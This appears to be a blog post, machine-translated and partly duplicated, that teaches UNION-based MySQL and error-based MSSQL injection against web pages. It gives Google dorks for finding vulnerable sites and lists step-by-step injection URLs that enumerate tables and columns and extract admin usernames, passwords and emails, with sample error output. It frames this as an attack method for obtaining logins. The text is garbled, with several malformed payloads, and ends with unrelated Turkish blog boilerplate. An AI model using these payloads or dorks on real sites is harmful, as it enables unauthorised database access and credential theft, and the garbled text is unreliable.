-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value'123456 'to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: 123456
Now to replace the rotating kolumnat act the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 from Users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: boom3rang@live.com
Here then we have to take some of the info-such as username / pass and emailaddress of a page.
username: Admin
password: 123456
emailaddress: boom3rang@live.com
[2.8 Conclusion]
###################
And here as the outcome will postojm All Links!
================================================== ================================================== ================================================== =======================================
www.localhost.com/lajmi.asp?id=100 '
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (@ @ version)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (db_name ()))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news', 'categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users'))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username ',' password ') )) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 username from Users)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
=============================================================================================================================================================================================
1. SQL-Tutorial-injetion
######################
1.1 What is SQL-injetion?
1.2 Try this page for vulnerability!
1.3 How to discover what numbers of kolumnave exist?
1.4 Try to select the function UNION!
1.5 How to discover the version of MySQL?
1.6 How to discover Table_name?
1.7 How to discover Column_name?
1.8 Conclusion?
============================
1.1 What is SQL-injetion?
============================
-SQL-injetion is therefore one of the methods used most days sodit to get access to any website.
This method gives permission to the attacker's attacks via a URL.
With this method the attacker has access to information different from MySQL's (username, passwords), different logins, access the page management, etc ... CC
====================================
1.2 Try this page for vulnerability!
====================================
We say that something such:
------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------
Now that the page is testojm that vulnerability, or simply have a go and it buggs add ( ') so presjen up, which will appear thus:
------------------------------------
http://www.site.com/vesti.php?id=1 '
------------------------------------
So after this action, if we give any error as such.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" or "Warning: mysql_result () [function.mysql-Result]"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++
By this means the page is vulnerability, so has concessions!
================================================== ===
1.3 How to discover what numbers of kolumnave exist?
================================================== ===
To find out how we use it Kolumna: Order by
So "order by" without a comma will helps us to find how many pages we have kolumna victim, go with the example:
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 1 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 2 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 3 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 4 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 Order by 5 - <-> Error page - So here we have error!
-------------------------------------------------- -------------------------------------------------- --
-With this mean that we have to this page 4 Kolumna, so the last marim number which does not error!
=======================================
1.4 Try to select the function UNION!
=======================================
So now will prove to nxjerim numbers kolumnave and other data in the window, through the "union select".
If you have 4 numbers in the kolumnave example would looked something like this:
-------------------------------------------------- -------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
-------------------------------------------------- -------------
If the window shown us any of the numbers from 1-4 is good and works quite OK, but if not then try to add the nji - (minus) before the "1 (nj?shi)" So first, the numbers can change may be 50,71,9999 etc example:
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-50 union select 1,2,3,4 --
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-71 union select 1,2,3,4 --
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
-------------------------------------------------- -----------------
Must now show any of 4 numbers from 1-4.
If any of these numbers appear, then everything is OK!
=========================================
1.5 How to discover the version of MySQL?
=========================================
How to discover the version of MySQL is easy, this can make replacing the kolumnes this "@ @ version."
Then we should show what version is present in the victim page.
Say that the number which appears in the window is 3-rain, to show the clear will tell you the example below.
-------------------------------------------------- ------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, @ @ version .4 --
-------------------------------------------------- ------------------------
And now with us will be displayed in the windows version.
It should be noted that the version 5.xx, we can get tables & kolumnat using function "INFORMATION_SCHEMA" while the older versions with this possibility does not exist or function.
=============================
1.6 How to discover Table_name?
=============================
As I mentioned above and that there is a small problem to older versions of MySQL's (4.xx 3.xx, etc.).
For this reason you will have once acted as if the version of MySQL, it is then for the 4.xx versions 5.xx
VERSION 4.x.x
To find older versions on table_name (4.xx, 3.xx) skemi any way out except to try and tables by rote, using a little logic.
For these versions is preferable to get a list of the major tables and try.
As the tables used are: users, user, admin, Admins, member, members, login, Administrators, mysql.user etc. ..
VERSION 5.x.x
Now note that if the page has 5.xx version is easier because now we can decide we use the function "INFORMATION_SCHEMA.TABLES" to detect and Tables "INFORMATION_SCHEMA.COLUMNS" kolumnat.
To find tables going to the example as follows:
-------------------------------------------------- -------------------------------------------------- ------
http://www.site.com/vesti.php?id=-9999 union select 1.2, table_name, 4 + from + information_schema.tables---
-------------------------------------------------- -------------------------------------------------- ------
Then replace the table_name the number that appears in our window, and then we must shafqen table.
===============================
1.7 How to discover Column_name?
===============================
The same applies to finding kolumnave (column_name) as the table_name!
VERSION 4.x.x
As with kolumna used are: username, user, user_name, usr, usn, pass, password, passwd, pwd, email, etc ... emailadress
VERSION 5.x.x
To reveal the names of kolumnave and as I said before is the same as off the table that only in this case, we must place writes tables set column / s.
Go to the display with this example:
-------------------------------------------------- -------------------------------------------------- -------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, 4 + from + information_schema.columns---
-------------------------------------------------- -------------------------------------------------- -------
Now to choose only one table and to detect only the names of its kolumnave go as example:
-------------------------------------------------- -------------------------------------------------- ------------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, information_schema.columns + 4 + from + where + table_name = Users --
-------------------------------------------------- -------------------------------------------------- ------------------------------
So in this case would appear only for column_name Table "Users".
Now for the end to say that is table_name (users) and are column_name (username, password, email).
So we must act to appear on the data from MySQL:
-------------------------------------------------- -------------------------------------------------- -------------------------
http://www.site.com/vesti.php?id=-71 union select 1.2, concat (username, chart (58), password, chart (58), email), 4 from users --
-------------------------------------------------- -------------------------------------------------- -------------------------
Concat () = used to bashkur 2.3 .. kolumna or more in one place.
Chart (58) = Jane colon (:) that makes the separation between column_name (of)!
================
1.8 Conclusion?
================
And as a result of the post will be all Links in a country that have to be based with easy!
================================================== ================================================== ==========================
http://www.site.com/vesti.php?id=1
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 '
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 1 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 2 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 3 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 4 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 Order by 5 - <-> Error page - So here we have error!
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, @ @ version .4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, table_name, 4 + from + information_schema.tables---
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, 4 + from + information_schema.columns---
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, information_schema.columns + 4 + from + where + table_name = Users --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-71 union select 1.2, concat (username, chart (58), password, chart (58), email), 4 from users --
================================================== ================================================== ==========================
____________________________________________________________________________________________________________________________________
################################################## ################################################## ################################
2. MSSQL - injection, method of attack!
######################################
2.1 Introduction
2.2 How to seek site vulnerability?
2.3 How to prove that a site is vulnerability?
2.4 How to discover version / name of the DB's?
2.5 How to discover the names of the tables (table_name)?
2.6 How to discover names of kolumnave (column_name)?
2.7 How to retrieve data from tables that interest us (eg, username, pass, email etc)?
2.8 Conclusion?
[INTRODUCTION 2.1]
###############
P?rsh?detje!
In this lesson, will you try to explain a technique to other already known, MSSQL-injection.
So you will have the opportunity to learn how this method is used, acting as the PET to obtain information (username, password, or logins) or various other info through this technique.
MSSQL-injection, can be used for products which are created by a company known Microsoft.
This type of injection, then deal with those pages which are coded in SSI / ASPX etc..
There are several types of attacks on this method as:
* - Normal MSSQL SQL Injection Attack
* - MSSQL Injection in Web Services (SOAP Injection)
* - MSSQL Injection Attack with UNION
* - ODBC Error Message Attack with "convert"
* - MSSQL Blind SQL Injection Attack, etc. ..
For this writing will use this type of attack:
"ODBC Error Message Attack with" convert "
[2.2 As demand vulnerability page? ]
############################################
How to look for pages that are vulnerability, is easy. This can make using the services of the Company GOOGLE gigante.
Go open: www.google.com
And write eg: inurl: ". Asp" id "
inurl: "news.asp" menu "
inurl: "content.asp" "sub"
inurl: "games.asp" id "
ETC ....( I decided a few examples, you now use the logic, for dorks best)
[2.3 How to prove that a site is vulnerability? ]
################################################## ######
This can be easily understood after adding id's of pages a high comma ( ').
And if we give our reply by displaying any error meant that the site is such vulnerability:
++++++++++++++++++++++++++++++++++++++
/ ODBC Microsoft Access Driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Ole DB Provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most frequent responses that appear on the page that are vulnerability to MSSQL - injection.
Now as an example the act must, therefore, must decide where presjen high ( ').
For example:
--------------------------------------
www.localhost.com/lajmi.asp?id=100 '
--------------------------------------
Now we say that an error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e14 '
Unclosed quotation mark after the character string ') AND (Volgorde> 0) Order by Volgorde'.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So the page is vulnerability?
[2.4 How to discover version / name of the DB's? ]
#################################################
Go with the example easier to understand:
Version:
-------------------------------------------------- ------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (@ @ version)) --
-------------------------------------------------- ------------------
And we will appear for example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM) 'to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go to discover Db_Name:
-------------------------------------------------- -------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (db_name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'KHG_CREW_DB' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[2.5 How to discover the names of the tables (table_name)]
################################################## # # # #
For discovered or simply to find the plates of any page go through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now an error will be displayed such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Users' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So in this case the table (table_name) is the first 'Users', now go to find the next table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And will now appear an error of njejt and will give the second table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'news' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Tables in this case is' news'
Now to find the Table (table_name) third go so:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
And we will show the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'categories' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
The third table is therefore 'categories', and continue so on until you discover all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -----------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news', 'categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -----------------------
[2.6 How to discover names of kolumnave (column_name)]
################################################## ######
-If you want to nxjerim column_name of table 'Users' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Username' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So the name of kolumn?s first table (table_name) 'Users' is' username'
Now go find kolumn?n (column_name) for the second the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'password' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Name kolumnes (column_name) the second is' password ', now go find the next column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username ',' password ') )) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'emailaddress' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So is the third Colum_name 'emailaddress' and so forth continue until the end, so as to find you all kolumnat (column_name)!
[2.7 How to get us interested in the data (username, pass, email, etc.)]
################################################## ##########################
To do so we do not have anything that we noted from ndyshe ago.
In this part of the whole that must be done is to zeven?sojm? Table (table_name), and the names of kolumnave (column_name) in their countries that previously have found.
For this part we will use:
Table_name = Users
Column_name = username, password, emailaddress!
Now going to replace, for example:
-------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 username from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'admin' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
username: Admin
Kolumn?n now replace the first "username" with the second kolumn?n "password":
For example:
-------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 password from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value'123456 'to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: 123456
Now to replace the rotating kolumnat act the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 from Users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: boom3rang@live.com
Here then we have to take some of the info-such as username / pass and emailaddress of a page.
username: Admin
password: 123456
emailaddress: boom3rang@live.com
[2.8 Conclusion]
###################
And here as the outcome will postojm All Links!
================================================== ================================================== ================================================== =======================================
www.localhost.com/lajmi.asp?id=100 '
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (@ @ version)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (db_name ()))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news', 'categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users'))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username ',' password ') )) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 username from Users)) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
=============================================================================================================================================================================================
Merhaba Dünya(Klasik Başlık:)
Merhaba Arkadaşlar Buradan Sizlere Bilgiler Vermeye Çalışacağım. Hayde Hayırlı Olsun :B
Kaydol:
Kayıtlar (Atom)